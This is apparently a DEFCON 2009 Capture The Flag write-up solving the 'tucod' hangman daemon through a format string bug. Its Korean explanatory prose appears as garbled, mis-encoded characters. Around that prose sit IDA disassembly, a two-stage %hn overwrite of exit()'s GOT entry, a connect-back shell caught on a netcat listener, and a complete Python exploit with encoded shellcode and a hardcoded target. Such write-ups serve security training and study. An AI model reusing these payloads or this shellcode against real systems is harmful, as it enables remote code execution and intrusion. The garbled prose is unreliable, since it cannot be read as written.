--------------------------------------------------- DEFCON 2009 Capture The Flag º»¼± ¹®Á¦ Ç®ÀÌ - tucod by hkpco(¹ÚÂù¾Ï) =============================== mail - chanam.park@hkpco.kr homepage - http://hkpco.kr/ date - 2009. 08. 07 =============================== --------------------------------------------------- 1. [Before] ¿ÃÇØ ºÎÅÍ´Â ±âÁ¸ CTFÀÇ ¿î¿µÀ» ´ã´çÇØ¿À´ø kenshoto°¡ ¹°·¯³ª°í ddtekÀÌ »õ·Î¿î ¿î¿µÁøÀ¸·Î ¼±Á¤µÇ¾ú´Ù. ´öºÐ¿¡ ÀüüÀûÀÎ ¿î¿µ¿¡ ´ëÇÑ ¹æ½ÄÀ̳ª °¢ ¹®Á¦ °³º°ÀÇ ½ºÅ¸ÀÏ È¤Àº ¼öÁØ µî¿¡ ¾î´ÀÁ¤µµ º¯È­°¡ ÀÖ¾ú´Ù. º» ¹®¼­¿¡¼­´Â tucod ¹ÙÀ̳ʸ®¿¡ ´ëÇÑ Ç®À̸¦ ±â¼ú ÇÒ °ÍÀ̸ç, IDAÀÇ disassemble °á°ú¸¦ ÅëÇÏ¿© ÁøÇàÇÏ°íÀÚ ÇÑ´Ù. ƯÁ¤ °ø°Ý ±â¼ú¿¡ ´ëÇÑ »ó¼¼ ¼³¸íÀ̳ª ÀϹÝÀûÀÎ ·çƾÀÇ ºÐ¼® ȤÀº ÀͽºÇ÷ÎÀÕ ´ç½ÃÀÇ ½ÃÇàÂø¿À µî°ú °°Àº ºÎ°¡ÀûÀÎ ¼³¸íÀº µÇµµ·Ï Á¦¿ÜÇÏ°í ÇÙ½ÉÀûÀÎ ³»¿ëÀ» À§ÁÖ·Î ±â¼úÇØ ³ª°¥ °ÍÀÌ´Ù. 2. [Solution] file ¸í·ÉÀ» ÅëÇÏ¿© ´ë»ó ¹ÙÀ̳ʸ®ÀÇ °£·«ÇÑ Á¤º¸¸¦ È®ÀÎÇÏ¿´´Ù. --------------------------------------------------------------------------------------------------------------------------- $ file tucod tucod: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), for FreeBSD 7.2, dynamically linked (uses shared libs), FreeBSD-style, stripped --------------------------------------------------------------------------------------------------------------------------- µ¿Àû ÄÄÆÄÀÏµÈ FreeBSD 7.2 ¹ÙÀ̳ʸ®À̸ç, µð¹ö±ë Á¤º¸´Â Á¦°ÅµÇ¾î Àִ°ÍÀ» È®ÀÎÇÒ ¼ö ÀÖ´Ù. µ¥¸ó ¼­¹öÀÇ Æ÷Æ® ¹øÈ£´Â °£´ÜÇÑ ºÐ¼®À» ÅëÇÏ¿© ½±°Ô È®ÀÎÇÒ ¼ö ÀÖÀ¸¹Ç·Î »ý·«ÇÏ°í, ¿ì¼± ¼­¹ö·Î Á¢¼ÓÇÏ¿© º¸ÀÚ. -------------------- $ nc localhost 57005 Password: hkpco_test -------------------- Æнº¿öµå¸¦ ÀԷ¹޴ °ÍÀ» º¼ ¼ö ÀÖÀ¸¸ç, À§¿Í °°ÀÌ ÀÏÄ¡ÇÏÁö ¾ÊÀ» °æ¿ì Á¾·áÇÑ´Ù. ÀÌ¿¡ ´ëÇÑ ·çƾÀº ´ÙÀ½¿¡¼­ º¼ ¼ö ÀÖ´Ù. >>> .text:08049C10 push ebp .text:08049C11 mov ebp, esp .text:08049C13 sub esp, 28h .text:08049C16 mov [esp+28h+var_24], offset aPassword ; "Password: " .text:08049C1E mov eax, [ebp+arg_0] .text:08049C21 mov [esp+28h+var_28], eax .text:08049C24 call sub_8048F60 // ¼ÒÄÏÀ» ÅëÇÏ¿© "Password: " ¹®ÀÚ¸¦ Àü¼Û .text:08049C29 mov [esp+28h+var_1C], 0Ah .text:08049C31 mov [esp+28h+var_20], 0FFh .text:08049C39 mov [esp+28h+var_24], offset byte_804B380 .text:08049C41 mov eax, [ebp+arg_0] .text:08049C44 mov [esp+28h+var_28], eax .text:08049C47 call sub_8048E20 // ¼ÒÄÏÀ» ÅëÇÏ¿© ¹öÆÛ¿¡ 255byte ÀÔ·Â .text:08049C4C mov [ebp+var_4], eax .text:08049C4F cmp [ebp+var_4], 0 .text:08049C53 jg short loc_8049C61 .text:08049C55 mov [ebp+var_14], 0 .text:08049C5C jmp loc_8049CFC .text:08049C61 ; --------------------------------------------------------------------------- .text:08049C61 .text:08049C61 loc_8049C61: ; CODE XREF: sub_8049C10+43j .text:08049C61 mov eax, [ebp+var_4] .text:08049C64 mov ds:byte_804B380[eax], 0 .text:08049C6B mov [esp+28h+var_24], offset aHangemhigh ; "HANGEMHIGH!" .text:08049C73 mov [esp+28h+var_28], offset byte_804B380 .text:08049C7A call _strcmp // ÀÔ·ÂÇÑ °ªÀÌ HANGEMHIGH! Àΰ¡¸¦ ºñ±³ <<< strcmp() ÇÔ¼öÀÇ ºñ±³ ·çƾÀ» ÅëÇÏ¿© µ¥¸óÀÇ Æнº¿öµå´Â "HANGEMHIGH!"ÀΰÍÀ» È®ÀÎÇÒ ¼ö ÀÖ´Ù. ¾Æ·¡´Â ã¾Æ³½ Æнº¿öµå·Î Á¢¼ÓÀ» ½ÃµµÇÑ °á°úÀÌ´Ù. --------------------------------------- $ nc localhost 57005 Password: HANGEMHIGH! Welcome to Hangman Blondie! What is your name? ChanAm Nice to meet you ChanAm prepare to die! --- | | | | | | ----- | | used: "" available: "abcdefghijklmnopqrstuvwxyz" current: _________ Your guess: a . . . Your guess: z --- | | O | /|\| | | / \| ----- | | Blondie, you missed, Tuco has hanged. The correct word is: lengthily. Play again (y/n)? n --------------------------------------- ÀԷ¹޴ ³»¿ëÀº "Æнº¿öµå, À̸§, ÃßÃø ¹®ÀÚ, °ÔÀÓ Àç½ÇÇà"À¸·Î ÃÑ 4°¡Áö Á¾·ù°¡ Á¸ÀçÇÑ´Ù. ±× Áß, À̸§À» ÀԷ¹޴ ·çƾÀ» »ìÆ캸µµ·Ï ÇÏÀÚ. >>> .text:080496D0 push ebp .text:080496D1 mov ebp, esp .text:080496D3 sub esp, 38h .text:080496D6 mov [esp+38h+var_34], offset aWhatIsYourName ; "What is your name? " .text:080496DE mov eax, [ebp+arg_0] .text:080496E1 mov [esp+38h+var_38], eax .text:080496E4 call sub_8048F60 // ¼ÒÄÏÀ» ÅëÇÏ¿© "What is your name? " ¹®ÀÚ¸¦ Àü¼Û .text:080496E9 mov [esp+38h+var_2C], 0Ah .text:080496F1 mov [esp+38h+var_30], 10h .text:080496F9 lea eax, [ebp+var_18] .text:080496FC mov [esp+38h+var_34], eax .text:08049700 mov eax, [ebp+arg_0] .text:08049703 mov [esp+38h+var_38], eax .text:08049706 call sub_8048E20 // Ãë¾àÇÑ ÇÔ¼ö¿¡ ÀÌ¿ëµÉ ¹öÆÛÀÇ µ¥ÀÌÅ͸¦ ÀԷ¹޴ ·çƾ .text:0804970B mov [ebp+var_4], eax .text:0804970E cmp [ebp+var_4], 0 .text:08049712 jg short loc_8049720 .text:08049714 mov [esp+38h+var_38], 0 .text:0804971B call _exit .text:08049720 ; --------------------------------------------------------------------------- .text:08049720 .text:08049720 loc_8049720: ; CODE XREF: name_recv+42j .text:08049720 mov eax, [ebp+var_4] .text:08049723 mov [ebp+eax+var_18], 0 .text:08049728 mov [esp+38h+var_34], offset aNiceToMeetYou ; "Nice to meet you " .text:08049730 mov eax, [ebp+arg_0] .text:08049733 mov [esp+38h+var_38], eax .text:08049736 call sub_8048F60 .text:0804973B lea eax, [ebp+var_18] .text:0804973E mov [esp+38h+var_34], eax .text:08049742 mov eax, [ebp+arg_0] .text:08049745 mov [esp+38h+var_38], eax .text:08049748 call sub_8048F60 // Ãë¾à¼º ¹ß»ý ÁöÁ¡ .text:0804974D mov [esp+38h+var_34], offset aPrepareToDie ; " prepare to die!\n" .text:08049755 mov eax, [ebp+arg_0] .text:08049758 mov [esp+38h+var_38], eax .text:0804975B call sub_8048F60 .text:08049760 leave .text:08049761 retn .text:08049761 name_recv endp <<< À̸§À» ÀԷ¹ÞÀº ´ÙÀ½ sub_8048F60 ÇÔ¼ö¸¦ È£ÃâÇϴ°ÍÀ» º¼ ¼ö ÀÖ´Ù. ÇØ´ç ÇÔ¼öÀÇ ·çƾÀº ´ÙÀ½°ú °°´Ù. Áß¿äÇÑ ·çƾ¸¸À» »ìÆ캸µµ·Ï ÇÏ°Ú´Ù. >>> .text:08048F60 push ebp .text:08048F61 mov ebp, esp .text:08048F63 sub esp, 28h .text:08048F66 mov [ebp+var_4], 0 .text:08048F6D mov [ebp+var_8], 0 .text:08048F74 lea eax, [ebp+arg_8] .text:08048F77 mov [ebp+var_C], eax .text:08048F7A mov eax, [ebp+var_C] .text:08048F7D mov [esp+28h+var_20], eax .text:08048F81 mov eax, [ebp+arg_4] .text:08048F84 mov [esp+28h+var_24], eax // ¾Õ¼­ ¿ì¸®°¡ ÀÔ·ÂÇÑ ³»¿ëÀÌ ÀúÀåµÈ ¹öÆÛ .text:08048F88 lea eax, [ebp+var_8] .text:08048F8B mov [esp+28h+var_28], eax // send() ÇÔ¼öÀÇ ÀÎÀÚ·Î Àü´ÞÇÒ ¹öÆÛ .text:08048F8E call _vasprintf . . .text:08048FA8 mov eax, [ebp+var_8] .text:08048FAB mov [esp+28h+var_20], 0 .text:08048FB3 mov [esp+28h+var_24], eax .text:08048FB7 mov eax, [ebp+arg_0] .text:08048FBA mov [esp+28h+var_28], eax .text:08048FBD call sub_8048EA0 .text:08048FC2 mov [ebp+var_4], eax // vasprintf() ÇÔ¼ö¸¦ ÅëÇÏ¿© ÀúÀåµÈ ¹öÆÛ¸¦ À§ ÇÔ¼öÀÇ ÀÎÀÚ·Î Àü´Þ(¼ÒÄÏ send ¼öÇà) <<< À§ ·çƾ¿¡¼­ Æ÷¸ä ½ºÆ®¸µ ¹ö±×(Format String Bug, ÀÌÇÏ FSB)°¡ ¹ß»ýÇÏ°Ô µÇ¸ç, À̸¦ °£´ÜÇÑ pseudo-code·Î ³ªÅ¸³»¸é ´ÙÀ½°ú °°´Ù. ------------------------------------------------------------------------------------------------------ recv( sockfd, buffer_1, size ); // ¼ÒÄÏÀ» ÅëÇØ ÀÓÀÇÀÇ µ¥ÀÌÅÍ ÀÔ·Â vsaprintf( buffer_2, buffer_1, ... ); // ÀԷ¹ÞÀº µ¥ÀÌÅÍ¿Í ÁÖ¾îÁø ½ºÆ®¸µÀ» °áÇÕÇÒ ¸ñÀûÀ¸·Î, vsaprintf() ÇÔ¼ö¸¦ ÅëÇØ buffer_2¿¡ Á¾ÇÕÇÏ¿© ÀúÀå send( sockfd, buffer_2, size ); // ÀúÀåµÈ ³»¿ëÀ» ¼ÒÄÏÀ¸·Î Àü¼Û ------------------------------------------------------------------------------------------------------ ÁÖ¼®¿¡¼­ ¼³¸íÇÑ °Í°ú °°ÀÌ vsaprintf() ÇÔ¼ö´Â ¹ÙÀ̳ʸ® ³»ºÎ¿¡ ÁöÁ¤µÈ ½ºÆ®¸µ°ú »ç¿ëÀÚ ÀÓÀÇÀÇ ¹®ÀÚ¿­À» °áÇÕÇÏ¿© Àü¼ÛÇÏ¿© ÁÙ ¸ñÀûÀ¸·Î ÀÌ¿ëµÇ¾úÀ¸¸ç, ÀÌ °úÁ¤¿¡¼­ ÇØ´ç ÇÔ¼öÀÇ »ç¿ë Áß¿¡ %s, %x µî°ú °°Àº Æ÷¸ä ½ºÆ®¸µÀÌ Á¦´ë·Î Àû¿ëµÇÁö ¾Ê¾Æ¼­ FSB Ãë¾à¼ºÀÌ ¹ß»ýÇÏ°Ô µÇ´Â °ÍÀÌ´Ù. ÀÌÁ¦ ÇØ´ç Ãë¾à¼ºÀ» ÀÌ¿ëÇÏ¿© °ø°Ý Äڵ带 ±¸¼ºÇÏ¸é µÇ°ÚÁö¸¸, ±×¿¡ ¾Õ¼­ ÇÑ °¡Áö ¹®Á¦°¡ ÀÖ´Ù. ´ÙÀ½°ú °°´Ù. >>> .text:080496E9 mov [esp+38h+var_2C], 0Ah .text:080496F1 mov [esp+38h+var_30], 10h // 16byte ÀÔ·Â .text:080496F9 lea eax, [ebp+var_18] .text:080496FC mov [esp+38h+var_34], eax .text:08049700 mov eax, [ebp+arg_0] .text:08049703 mov [esp+38h+var_38], eax .text:08049706 call sub_8048E20 // sub_8048E20´Â ¼ÒÄÏÀ» ÅëÇØ Æ¯Á¤ ¹ÙÀÌÆ®¸¸Å­ ÀÔ·ÂÀ» ¹Þ´Â ÀϹÝÀûÀÎ ÇÔ¼ö <<< À§´Â Ãë¾àÇÑ ÇÔ¼ö¿¡ Àü´ÞÇϱâ À§ÇÑ ¹öÆÛÀÇ µ¥ÀÌÅ͸¦ ÀԷ¹޴ ·çƾÀ¸·Î ¾Õ¼­ ÀÌ¹Ì º¸¿©ÁÖ¾ú´Ù. ¿©±â¼­ ¹®Á¦Á¡Àº °ø°Ý Äڵ带 ±¸¼ºÇÒ ¹öÆÛÀÇ Å©±â°¡ 16byte¹Û¿¡ µÇÁö ¾Ê´Â´Ù´Â °ÍÀÌ´Ù. ÀϹÝÀûÀ¸·Î ÇØ´ç Å©±â¿¡ ¸ÂÃ߾ °ø°Ý Äڵ带 ±¸¼ºÇϱⰡ ºÒ°¡´ÉÇÑ °ÍÀº ¾Æ´ÏÁö¸¸ ÀÌ·¯ÇÑ °ø°ÝÀÇ ¼º°ø ¿©ºÎ¸¦ °áÁ¤Áþ´Â µ¥¿¡´Â ¿©·¯°¡Áö ȯ°æÀû ¿ä¼Ò°¡ ¸¹ÀÌ µû¸¥´Ù. ½ÇÁ¦·Î $-flag µîÀÇ ´Ù¾çÇÑ Æ®¸¯À» ÀÌ¿ëÇÏ¿© °ø°ÝÀ» ½ÃµµÇØ º¸¾ÒÁö¸¸, °£¼ÒÇÑ ¿ÀÇÁ¼Â »óÀÇ ¹®Á¦ ¶§¹®¿¡ °ø°ÝÀÌ Á¦´ë·Î ¼º¸³µÇÁö ¾Ê¾Ò´Ù. Á¶±Ý ´õ ÀüüÀûÀÎ ½Ã°¢¿¡¼­ ¼öÇàµÇ´Â ·çƾÀ» »ìÆ캸°ÔµÇ¸é ´Ù½Ã±Ý ¶Ç ´Ù¸¥ Ãë¾à¼ºÀ» ¹ß°ßÇÒ ¼ö Àִµ¥, Á÷Á¢ ·çƾÀ» »ìÆ캼 ¼öµµ ÀÖ°ÚÁö¸¸ ¿©±â¼­´Â °£´ÜÇÏ°Ô °ÔÀÓÀÌ ÇÑ ¹ø ³¡³­ ÀÌÈÄ¿¡ ´ÙÀ½°ú °°Àº ½ÇÇà»óÀÇ Æ¯Â¡À» °üÂûÇÏ´Â °ÍÀ¸·Î È®ÀÎÇϵµ·Ï ÇÏ°Ú´Ù. --------------------------- . . The correct word is: ripen. Play again (y/n)? y New Player (y/n)? y What is your name? // Ãë¾àÇÑ ÇÔ¼ö Àç ½ÇÇà --------------------------- À§¿Í °°ÀÌ °ÔÀÓÀ» Àç½ÃÀÛÇÏ°Ô µÇ¸é »õ·Î¿î Ç÷¹À̾îÀÇ »ý¼º À¯¹«¸¦ ¼±ÅÃÇÒ ¼ö ÀÖ°Ô µÈ´Ù. y¸¦ ÀÔ·ÂÇÑ ´ÙÀ½ Ãë¾àÇÑ ÇÔ¼ö¸¦ Çѹø ´õ ¼öÇàÇÏ¿© »õ·Î¿î À̸§À» ÀԷ¹ÞÀ» ¼ö ÀÖ°Ô µÇ°í, ÀÌ´Â °ø°Ý Äڵ带 ¿©·¯ ·çƾ¿¡ °ÉÃļ­ 16byte ´ÜÀ§·Î ºÐÇÒÇÏ¿© ¿øÇÏ´Â Å©±â¸¸Å­ ±¸¼ºÇÒ ¼ö ÀÖ´Ù´Â ¸»ÀÌ µÈ´Ù. ±×·³ ÀÌÁ¦, Ãë¾àÇÑ ÇÔ¼ö¸¦ Çѹø ´õ ¼öÇàÇϱâ À§ÇÏ¿© Áï, °ÔÀÓÀ» Çѹø ´õ ¼öÇàÇϱâ À§ÇØ ±âÁ¸ÀÇ °ÔÀÓÀ» Á¤»óÀûÀ¸·Î ¸¶ÃÄ¾ß Çϴµ¥, À̸¦ À§Çؼ­ ¹ÙÀ̳ʸ®ÀÇ ÇØ´ç ·çƾÀ» ÀÏÀÏÀÌ ºÐ¼®ÇÒ ÇÊ¿ä´Â ¾ø´Ù. °ÔÀÓÀ» Á¶±Ý¸¸ »ìÆ캸¸é ¸ðµç ¾ËÆĺª ¼Ò¹®ÀÚ¸¦ ÀÔ·Â ¹ÞÀ» ¼ö ÀÖµµ·Ï µÇ¾îÀÖÀ¸¸ç, ƯÁ¤ Ƚ¼ö±îÁö ÀԷ¹޾Ƽ­ ´äÀ» ¸ÂÃ߰ųª ȤÀº ±× ¾È¿¡ ¸ø ¸ÂÃß°Ô µÉ °æ¿ì °ÔÀÓÀÌ ³¡³­ µÚ Àç½ÃÀÛ ÇÒ °ÍÀÎÁö¸¦ ¹¯´Â ¸Þ½ÃÁö°¡ ³ª¿À°Ô µÈ´Ù. ±×·¡¼­ ¸ðµç ¾ËÆĺªÀ» ´ë»óÀ¸·Î °ÔÀÓÀÇ Àç½ÃÀÛÀ» ¹¯´Â ¸Þ½ÃÁö°¡ ³ª¿Ã ¶§ ±îÁö ÀÔ·ÂÀ» ÁøÇàÇÏ¸é µÈ´Ù. ´ÙÀ½À¸·Î return address µîÀÇ EIP º¯Á¶°¡ °¡´ÉÇÑ ÁÖ¼Ò °ªÀ» °ø·«ÇØ¾ß Çϸç, ÀÌ´Â ´ÙÀ½ ·çƾ¿¡¼­ ãÀ» ¼ö ÀÖ´Ù. >>> .text:08049BB2 mov [esp+28h+var_24], offset aInvalidGuessGo ; "Invalid guess, goodbye.\n" .text:08049BBA mov eax, [ebp+arg_0] .text:08049BBD mov [esp+28h+var_28], eax .text:08049BC0 call sub_8048F60 .text:08049BC5 mov [esp+28h+var_28], 0 .text:08049BCC call _exit <<< ¾ËÆĺªÀ» ÃßÃøÇÏ´Â ÀÔ·Â ·çƾ¿¡ ÇÑ ¹®ÀÚ¸¦ ÃÊ°úÇϰųª ¾ËÆĺª ¹üÀ§¸¦ ¹þ¾î³ª´Â ÀÔ·ÂÀ» ÇÒ °æ¿ì À§¿Í °°ÀÌ exit() ÇÔ¼ö¸¦ ÅëÇÏ¿© Á¢¼ÓÇÑ Å¬¶óÀ̾ðÆ®ÀÇ µ¥¸ó ÇÁ·Î¼¼½º¸¦ Á¾·áÇÏ°Ô µÈ´Ù. ÀÌÁ¦, exit() ÇÔ¼öÀÇ Global Offset Table(ÀÌÇÏ GOT)À» ½©Äڵ尡 ÀúÀåµÇ¾îÁø ÁÖ¼Ò·Î º¯È¯ÇÑ ´ÙÀ½ À§ ·çƾÀ» À¯µµÇÏ¿© ¿øÇÏ´Â Äڵ带 ½ÇÇà ½ÃÅ°µµ·Ï °ø°Ý Äڵ带 ±¸¼ºÇÒ °ÍÀÌ´Ù. exit() ÇÔ¼öÀÇ GOTÀº ´ÙÀ½°ú °°ÀÌ ±¸ÇÒ ¼ö ÀÖ´Ù. --------------------------------------------- # objdump -R tucod tucod: file format elf32-i386-freebsd DYNAMIC RELOCATION RECORDS OFFSET TYPE VALUE 0804b360 R_386_COPY __mb_sb_limit 0804b364 R_386_COPY _CurrentRuneLocale 0804b2ac R_386_JUMP_SLOT setuid 0804b2b0 R_386_JUMP_SLOT seteuid ... 0804b330 R_386_JUMP_SLOT exit ... --------------------------------------------- ½©Äڵ带 ÀúÀåÇÒ ¼ö ÀÖ´Â °ø°£Àº ´ÙÀ½ ·çƾÀÇ ºÐ¼®À» ÅëÇÏ¿© È®º¸ÇÒ ¼ö ÀÖ´Ù. >>> .text:08049C16 mov [esp+28h+var_24], offset aPassword ; "Password: " .text:08049C1E mov eax, [ebp+arg_0] .text:08049C21 mov [esp+28h+var_28], eax .text:08049C24 call sub_8048F60 // ¼ÒÄÏÀ» ÅëÇÏ¿© "Password: " ¹®ÀÚ¿­ Àü¼Û .text:08049C29 mov [esp+28h+var_1C], 0Ah .text:08049C31 mov [esp+28h+var_20], 0FFh .text:08049C39 mov [esp+28h+var_24], offset byte_804B380 .text:08049C41 mov eax, [ebp+arg_0] .text:08049C44 mov [esp+28h+var_28], eax .text:08049C47 call sub_8048E20 // 0804B380h ÁÖ¼Ò °ø°£¿¡ 0FFh(255byte) Å©±â¸¸Å­ ÀÔ·Â <<< À§¿Í °°ÀÌ, µ¥¸ó Ãʱ⿡ Æнº¿öµå¸¦ ÀԷ¹޴ ·çƾ¿¡¼­ ½© ÄÚµåÀÇ ÀúÀåÀ» À§ÇÑ »ó´ëÀûÀ¸·Î ¿©À¯·Î¿î °ø°£À» È®º¸ÇÒ ¼ö ÀÖ´Ù. ÇÏÁö¸¸ ÇØ´ç °ø°£Àº Æнº¿öµå ÀÔ·Â ¹× ºñ±³¿¡ ¾²À̱⠶§¹®¿¡ ´ÙÀ½°ú °°ÀÌ µ¥ÀÌÅ͸¦ ±¸¼ºÇØ¾ß ÇÑ´Ù. -------------------------------- [Password][Null_Byte][Shellcode] -------------------------------- ÀÌÈÄ, Æнº¿öµå´Â strcmp() ÇÔ¼ö¸¦ ÅëÇÏ¿© ºñ±³°¡ ÀÌ·ç¾îÁö¹Ç·Î ´ëºÎºÐÀÇ ¹®ÀÚ¿­ °ü·Ã ÇÔ¼ö°¡ null_byte¸¦ ³¡À¸·Î ÀÎÁöÇϴ Ư¼º»ó ÇØ´ç ºñ±³´Â ¹«»çÈ÷ Åë°úÇÒ ¼ö ÀÖ°Ô µÈ´Ù. ±× ´ÙÀ½, ½© Äڵ尡 ÀúÀåµÈ ÁÖ¼Ò´Â Æнº¿öµå¿Í null_byte ¸¸Å­ÀÇ ¿ÀÇÁ¼ÂÀÌ ´õÇØÁø À§Ä¡°¡ µÇ¾î¾ß ÇÒ °ÍÀÌ´Ù. ÀÌ·Î½á °ø°ÝÀ» À§ÇÑ ÃÖÁ¾ Payload´Â ´ÙÀ½°ú °°´Ù. ============================================================================================= 1> [Password][Null_Byte][Shellcode] 2> exit ÇÔ¼öÀÇ »óÀ§/ÇÏÀ§ 2byte¸¦ shellcode°¡ À§Ä¡ÇÑ ÁÖ¼ÒÀÇ »óÀ§/ÇÏÀ§ 2byte·Î µ¤´Â FSB ÄÚµå_1 3> °ÔÀÓ Àç½ÃÀÛ ¸Þ½ÃÁö°¡ ³ª¿Ã ¶§ ±îÁö ¾ËÆĺª a-z¸¦ ÀÔ·Â 4> Àç½ÃÀÛ ¸Þ½ÃÁö°¡ ³ª¿Ô´Ù¸é, y¸¦ ÀÔ·Â 5> »õ·Î¿î Ç÷¹À̾ ¿øÇÏ´Â Áú¹® ¸Þ½ÃÁö°¡ ³ª¿Ô´Ù¸é, y¸¦ ÀÔ·Â 6> exit ÇÔ¼öÀÇ »óÀ§/ÇÏÀ§ 2byte¸¦ shellcode°¡ À§Ä¡ÇÑ ÁÖ¼ÒÀÇ »óÀ§/ÇÏÀ§ 2byte·Î µ¤´Â FSB ÄÚµå_2 7> °ÔÀÓ ºñÁ¤»ó Á¾·á¸¦ À§ÇÑ ¹®ÀÚ¿­ ÀÔ·Â ============================================================================================= ´ÙÀ½Àº ÇØ´ç °ø°Ý Äڵ带 ±â¹ÝÀ¸·Î ¸¸µé¾îÁø ÀͽºÇ÷ÎÀÕÀ» ½ÇÇàÇÑ °á°úÀÌ´Ù. ---------- TERMINAL 1 --------------------------- $ python tuco_exp.py Password: Welcome to Hangman Blondie! What is your name? [+] alphabet(a) [+] alphabet(b) [+] alphabet(c) [+] alphabet(d) [+] alphabet(e) [+] alphabet(f) [+] alphabet(g) [+] alphabet(h) [+] alphabet(i) New Player (y/n)? What is your name? Nice to meet you 0 ... [+] exploit exit --------------------------- ---------- TERMINAL 2 ----------------------------------------------- $ nc -l 7777 id uid=1006(tuco) gid=1006(tuco) groups=1006(tuco) ----------------------------------------------- ¼º°øÀûÀ¸·Î °ø°ÝÀÌ ¼öÇàµÈ °ÍÀ» È®ÀÎÇÒ ¼ö ÀÖ´Ù. 3. [Exploit] ÀͽºÇ÷ÎÀÕÀº PythonÀ¸·Î °£´ÜÈ÷ ÀÛ¼ºµÇ¾úÀ¸¸ç, ¼¼·ÃµÈ ÄÚµù ±â¹ýÀº ÀüÇô °í·ÁÇÏÁö ¾Ê¾Ò´Ù. ÄÚµåÀÇ Áß°£ Áß°£¿¡ Áö¿¬½Ã°£À» ÁØ °ÍÀº ¿ø°Ý ¼­¹ö¿¡¼­ Åë½ÅÀÌ ´Ê¾îÁú ¶§ Àü¼ÛÇÑ µ¥ÀÌÅÍ°¡ ÇÑ ¹ø¿¡ Àü´ÞµÇÁö ¸øÇÒ °æ¿ì¸¦ À§Çؼ­ÀÌ´Ù. Âü°í·Î telnetlib ¸ðµâÀ» »ç¿ëÇϸé ÄÚµùÀÌ ´õ ÆíÇØÁö°ÚÁö¸¸, À̷δ Á¤»óÀûÀÎ Åë½ÅÀÌ ÁøÇàµÇÁö ¾Ê´Â´Ù. - tuco_exp.py - # tucod exploit by hkpco from socket import * import time target = '192.168.40.26' port = 57005 pay_name = "HANGEMHIGH!" + "\x00" + "\x90"*64 + "\xb8\x67\x25\x8b\x3b\x2b\xc9\xb1\x11\xdb\xc8\xd9\x74\x24\xf4\x5f\x31\x47\x0e\x03\x47\x0e\x83\x88\xd9\x69\xce\x3e\xe2\xc6\x19\xa4\x8a\xe9\x58\xc6\x2b\x9f\xba\xc7\x6b\xcf\x2e\x26\x06\xf2\xc4\x38\x66\x93\xd5\xb8\xd1\x04\xb6\xd2\xbf\xfc\xfb\xa2\x10\x97\x59\xfa\x5d\xe7\xa1\xb5\xb5\x91\xab\x21\x69\x4d\x27\xd9\x1d\xbe\xa5\x70\xb0\x49\xca\xd2\x18\x19\x5d\x62\x9b\x50\xdd" + "\n" pay_a = "\x32\xb3\x04\x08" + "%2048c%7$hn" + "\n" pay_b = "\x30\xb3\x04\x08" + "%45980c%7$hn" + "\n" # 0x0804b330 R_386_JUMP_SLOT exit words = "abcdefghijklmnopqrstuvwxyz" sockfd = socket( AF_INET, SOCK_STREAM ) sockfd.connect((target, port)) print sockfd.recv(10240) sockfd.send(pay_name) # 1 print sockfd.recv(10240) sockfd.send(pay_a) # 2 print sockfd.recv(10240) for ch in words: time.sleep(0.2) sockfd.send(ch+'\n') buffer = sockfd.recv(10240) time.sleep(0.1) buffer2 = sockfd.recv(10240) if buffer.find('Play again') != -1 or buffer2.find('Play again') != -1: time.sleep(0.2) sockfd.send("y\n") time.sleep(0.2) buffer = sockfd.recv(1024) print buffer if buffer.find('New Player') != -1: time.sleep(0.2) sockfd.send('y\n') time.sleep(0.2) buffer = sockfd.recv(10240) print buffer sockfd.send(pay_b) time.sleep(0.2) sockfd.send("hk\n"); # abnormal exit time.sleep(0.2) print sockfd.recv(10240) exit(-1) print 'alphabet(' +ch+ ')' print 'loop end'